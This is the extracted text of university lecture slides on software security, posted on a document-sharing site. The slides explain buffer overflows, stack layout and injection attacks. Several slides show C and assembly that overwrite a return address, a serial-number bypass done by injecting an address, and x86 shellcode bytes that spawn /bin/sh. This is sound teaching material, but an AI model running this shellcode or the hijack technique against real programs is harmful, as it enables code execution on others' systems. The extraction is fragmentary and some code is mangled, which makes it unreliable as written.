• No results found

Lect-17Software Security

N/A
N/A
Info
Download
Protected

Academic year: 2020

Share "Lect-17Software Security"

Copied!
31
0
0

Loading.... (view fulltext now)

Download now ( 31 Page )

Full text

(1)
(2)

Background

Many vulnerability of applications are not from their

specifications and protocols but from their

implementations

Weak implementation of passwords

Buffer Overflow (can be used to redirect the

control flow of a program)

race conditions

(3)

Definition

(4)

Most Common Attacks on the Software.

Buffer overflow

stack overflow

command injection

(5)

Buffer Overflow

Buffer and stack overflow attacks overwrite the contents of the heap

or stack respectively by writing extra bytes.

(6)

Stack Overflow

(7)

Command Injection

(8)

SQL Injection

SQL injections use malicious SQL code to retrieve or modify

important information from database servers. SQL injections

can be used to bypass login credentials. Sometimes SQL

injections fetch important information from a database or

delete all important data from a database.

(9)

Background-

Buffer overflow

Typical Attack Scenario:

Users enter data into a Web form

Web form is sent to server

Server writes data to buffer, without checking length of input data

Data overflows from buffer

Sometimes, overflow can enable an attack

Web form attack could be carried out by anyone with an Internet

(10)

Background-

layout of the Virtual Space of a Process

The

layout of the

virtual space of a

(11)

Cont.

Code and data consist of instructions and initialized ,

uninitialized global and static data respectively;

Runtime heap is used for dynamically allocated

memory(malloc());

(12)

Layout Of Stack

Grows from high-end address to low-end address (buffer

grows from low-end address to high-end address);

Return Address- When a function returns, the instructions

pointed by it will be executed;

Stack Frame pointer(esp)- is used to reference to local

(13)

Example

int cal(int a, int b) {

int c;

c = a + b; return c; }

int main () {

int d;

d = cal(1, 2); printf("%d\n", d); return;

}

Stack high-end address low-end address

b(2) a(1)

ret

addr(0x08048229) previous ebp

c

esp

(14)

0x08048204 <main+0>: lea 0x4(%esp),%ecx 0x08048208 <main+4>: and $0xfffffff0,%esp 0x0804820b <main+7>: pushl -0x4(%ecx) 0x0804820e <main+10>: push %ebp

0x0804820f <main+11>: mov %esp,%ebp 0x08048211 <main+13>: push %ecx

0x08048212 <main+14>: sub $0x24,%esp

0x08048215 <main+17>: movl $0x2,0x4(%esp) ; pass parameter

0x0804821d <main+25>: movl $0x1,(%esp) ; pass parameter

0x08048224 <main+32>: call 0x80481f0 <cal>

0x08048229 <main+37>: mov %eax,-0x8(%ebp) 0x0804822c <main+40>: mov -0x8(%ebp),%eax 0x0804822f <main+43>: mov %eax,0x4(%esp) 0x08048233 <main+47>: movl $0x80a0c88,(%esp) 0x0804823a <main+54>: call 0x8048c40 <printf> 0x0804823f <main+59>: add $0x24,%esp

0x08048242 <main+62>: pop %ecx 0x08048243 <main+63>: pop %ebp

0x08048244 <main+64>: lea -0x4(%ecx),%esp 0x08048247 <main+67>: ret

(15)

Dump of assembler code for function cal:

0x080481f0 <cal+0>: push %ebp

0x080481f1 <cal+1>: mov %esp,%ebp

0x080481f3 <cal+3>: sub $0x10,%esp ; reserve 16 bytes for local variables in stack

0x080481f6 <cal+6>: mov 0xc(%ebp),%eax 0x080481f9 <cal+9>: add 0x8(%ebp),%eax

0x080481fc <cal+12>: mov %eax,-0x4(%ebp) 0x080481ff <cal+15>: mov -0x4(%ebp),%eax 0x08048202 <cal+18>: leave

(16)

Layout of Heap

Global variables

Static variables

(17)

Stack Buffer Overflow

A buffer overflow occurs when too much data is put into the

buffer;

C language and its derivatives(C++) offer many ways to put

(18)

Example

Int bof() {

char buffer[8]; // an 8 bytes buffer which is in the stack

strcpy(“buffer, “AAAAAAAAAAAAAAAAAAA””); // copy 20 bytes into buffer

// this will cause to the content of “ret” to be overwritten; // namely, the return address will be 0x41414141(AAAA)

return 1; }

int main () {

bof(); // call bof

printf(“end\n”); // will never be executed;

return 1; } AAAA AAAA AAAA (previous EBP)

AAAA (RET->printf())

AAAA

ESP

(19)

Basic Idea of the Attack using stack buffer overflow

Stack grows High address Low address

TOP of Stack

Attack Code

Local variable (buffer)

RET

String grows

 Inject malicious code into the virtual space of a process;

(20)

Example

Program asks for a serial number that attacker does not know

Attacker also does not have source code

Attacker does have the executable (exe)

(21)

Cont.

• Note that 0x41 is “A”

• Looks like ret overwritten by 2 bytes!

• I think the stack is overwitten by 3 bytes.

(22)

Cont.

(23)

Cont.

Find that 401034 is “@^P4” in ASCII ('\0' is 00)

• Byte order is reversed? Why?

(24)

Cont.

Reverse the byte order to “4^P@” (\x34\x10\x40\x00) and…

• Success! We’ve bypassed serial number check by exploiting

a buffer overflow

(25)

Example-Create a shell

char shellcode[] =

"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"

"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main(){

char *name[2];

name[0] = "/bin/sh"; name[1] = 0x0;

execve(name[0], name, 0x0); exit(0);

}

Shellcode can be looked as a

sequence of binary instructions;

The purpose of this shellcode

is to create a command shell in

linux.

(26)

Cont.

void sh() {

int *return;

return = (int *)&return + 2; // let ret point to the unit containing the return address

(*return) = (int)shellcode; // let the return address point to the shellcode (shell code to create a shell)

}

int main() {

sh();

printf("main end :)\n"); return;

(27)

Cont.

(gdb) disas sh

Dump of assembler code for function sh: 0x08048208 <sh+0>:push %ebp

0x08048209 <sh+1>:mov %esp,%ebp 0x0804820b <sh+3>:sub $0x10,%esp

0x0804820e <sh+6>:lea -0x4(%ebp),%eax 0x08048211 <sh+9>:add $0x8,%eax

0x08048214 <sh+12>: mov %eax,-0x4(%ebp)

0x08048217 <sh+15>: mov -0x4(%ebp),%edx

0x0804821a <sh+18>: mov $0x80bd6a0,%eax

0x0804821f <sh+23>: mov %eax, (%edx)

0x08048221 <sh+25>: leave 0x08048222 <sh+26>: ret

Previous ebp return

(28)

Three issues for injecting codes

How to find a location in the stack to inject malicious code?

How to generate a shellcode (Attack Code)?

How to redirect the execution flow to the shellcode?

If using stack buffer overflow, the content of memory unit

storing return address should be modified.

The injected payload should be long enough to do

(29)

How to find a location to inject code

If using stack buffer overflow, we might need to locate the stack of a

function.

Then we need to determine the offset from the bottom or the top

of stack to inject the shell code

We can use the following code to locate a stack:

unsigned long find_start(void) {

__asm__("movl %esp, %eax"); }

unsigned long find_end(void) {

(30)

Cont.

unsigned long find_start(void) {

__asm__("movl %esp, %eax"); }

unsigned long find_end(void) {

__asm__("movl %ebp, %eax"); }

int main() {

(31)

How to Avoid Software Attacks

The only way to avoid such attacks is to

practice good programming techniques.

System-level security can be provided using

better firewalls.

Using intrusion detection and prevention can

References

Download now ( PPTX - 31 Page - 701.76 KB )

Related documents

Self-Fashioning, Double Consciousness, and a History of Representation: The Narratives of Frederick Douglass and Solomon Northup as Compared to Runaway Slave Advertisements

African Americans like Frederick Douglass were born into slavery and experienced at a young age the projected identity of being less than human by their white oppressors. Northup

LOCAL EMPLOYMENT DYNAMICS: Connecting Workers and Jobs. Heath Hayward Geographer Center for Economic Studies U.S. Census Bureau

Note: A job in LODES are defined as Beginning of Quarter Employment, which means the worker was employed by the same employer in both the current (2nd) and previous (1st)

Bi-directional Causality Between Remittances and Poverty: An Empirical Evidence From Pakistan.

Similarly when remittances are taken as dependent variable, the short relationship between remittances and poverty is positive and significant at 1 percent.. The lag

NACE RESEARCH NACE RESEARCH. Job Outlook 2006 $39.95

Among respondents, roughly two out of five (42.9 percent) reported that they offered signing bonuses to 2004-05 graduates, and 43.9 percent reported that they have plans to

Test Assertions for the SCA WS-BPEL Client and Implementation Version 1.1 Specification

Tags “component type” “reference” “partner link” “static analysis” Comment Assertion ID SBL-TA-2007 Source [SBPEL2009] Target Prerequisites Predicate Prescription Level

Tonight s Speaker. Life of a Tester at Microsoft Urvashi Tyagi Software Test Manager, Microsoft

Test strategy Master plan Test Design Specificatio n Test cases Test tool Bug report Test Sign- off Test Deliverables PLC TLC Testability..  Windows Vista + Office 12

The Role of Evidence in General Managers’ Decision-making

Given then that a) there is little evidence on the prevalence of the use of EBM by general managers and b) there is some ambiguity in the literature as to i) what constitutes

Adoption of Improved Maize and Common Bean Varieties in Mozambique

This study identifies factors that are associated with households’ adoption of improved maize and bean varieties, using Trabalho de Inquérito Agrícola (TIA) 2007 data and the